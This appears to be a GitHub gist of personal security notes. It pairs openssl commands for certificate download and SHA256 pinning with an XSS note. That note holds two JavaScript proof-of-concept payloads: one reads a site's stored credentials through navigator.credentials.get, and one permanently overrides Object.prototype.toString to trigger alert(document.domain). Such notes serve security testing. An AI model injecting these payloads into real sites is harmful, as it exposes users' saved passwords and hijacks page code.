Skip to content

Instantly share code, notes, and snippets.

@iegik

iegik/JSON.md

Last active March 13, 2024 09:45
Show Gist options
  • Save iegik/857dd1af3bbfbe656f587db9bc24123c to your computer and use it in GitHub Desktop.
Save iegik/857dd1af3bbfbe656f587db9bc24123c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
README.md

Security

Download CA cert

openssl s_client -showcerts -connect $1 </dev/null 2>/dev/null|openssl x509 -outform PEM > $2

Make SSL SHA256 pin from PEM

cat $1 | openssl x509 -inform pem -noout -outform pem -pubkey | openssl pkey -pubin -inform pem -outform der | openssl dgst -sha256 -binary | openssl enc -base64

Retrieve a certificate's SHA1 hash from macOS Keychain Access via Terminal

security find-certificate -Z
Raw
XSS.md

Getting credentials for site

if ("credentials" in navigator) {
  navigator.credentials.get({ password: true }).then((creds) => {
    console.log({creds})
  });
} else {
  //Handle sign-in the way you did before.
}

Permamentely overwrite Object.prototype.toString

(function () {
    let __count = 0;
    Object.defineProperty(Object.prototype, 'toString', {
      configurable: false,
      set: () => {
        /*readonly*/
      },
      get: () => () => {
        __count++ || alert(document.domain); // Attack
        console.log('toString executed ' + __count + ' times');
        return `${document.domain}`;
      },
    });

    console.log(arguments.callee.toString());
  })();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment